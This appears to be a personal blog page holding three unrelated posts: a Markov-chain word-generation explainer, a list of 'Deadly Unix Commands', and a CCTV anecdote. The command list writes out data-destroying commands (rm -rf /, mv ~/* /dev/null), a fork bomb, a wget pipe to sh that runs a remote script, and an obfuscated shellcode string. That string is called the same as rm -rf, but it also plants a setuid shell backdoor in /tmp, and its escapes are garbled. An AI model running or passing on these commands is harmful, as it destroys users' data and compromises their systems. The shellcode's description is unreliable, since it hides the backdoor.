Markov chains based random word generation

Markov chains are used primarily in Natural Language Processing for part-of-speech tagging. Corpora are studied to establish the construction of sentences. This is a very powerful algorithm that can also be used to generate new material (words, text, et cetera). In this first post I will talk about generating words.

  • How it works

Given a corpus, letter patterns are studied at different depths. For depth one, the probability of a letter following another is established. For depth two the probability of a letter following a sequence of 2 letters is established. The same goes for greater depths. The result of all this studying is a table of probabilities defining the chances that letters follow given sequences of letters.

When the time comes to generate words, this table of probabilities is used. Say that we need to generate a word at depth 2, we seed the word with 2 null letters, then we look in the table for all the letters that can follow a sequence of 2 null letters and their associated probabilities. Their added probabilities will be 1 obviously. We generate a random number between 0 and 1 and use it to pick which following letter will be chosen. Let’s say that the letter “r” was chosen. Our generated word is now comprised of “null” and “r”. We now use this sequence as the basis for our next letter and look for the letters that can follow it. We keep going until an null letter is reached, signifying the end of the generated word.

Here’s a sample of a probability table:

  • Benefits of this algorithm

It will generate words that do not exist but respect the essence of the corpus it’s based on. This is really cool for example to generate words that sound English but aren’t (say for random passwords that can be pronounced/remembered). We could also make a list of all the cool words (motorcycle, sunglasses, racing, et cetera) and extract their essence to generate maybe a product name that is based on coolness :).

Go ahead and play with it:

Deadly Unix Commands

  • the oldie but goodie
rm -rf /

will recursively/force erase starting from the root directory

  • the obfuscated oldie but goodie
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

same as the previous one but harder to tell what it actually does

  • the fork bomb
<code class="plain plain">:(){:|:&};:</code>

forks processes until the box dies. note that this command should not result in permanent damage unlike the other ones.

  • running code from a remote source
wget http://remote_source.com/lulscript -O- | sh

lulscript will be executed on the local machine

  • the one you don’t need root for
mv ~/* /dev/null

sends the relative home directory into a black hole

OH MY GOD

I came home to find one of my garbage cans laying on the ground. WHAT THE HELL? WHO DID THIS? I know, I will solve this ruthless crime with my new CCTV installation.

An the culprit is:

[flv:http://ben.akrin.com/wp-content/uploads/2010/12/poubelle.flv 640 480]

the wind…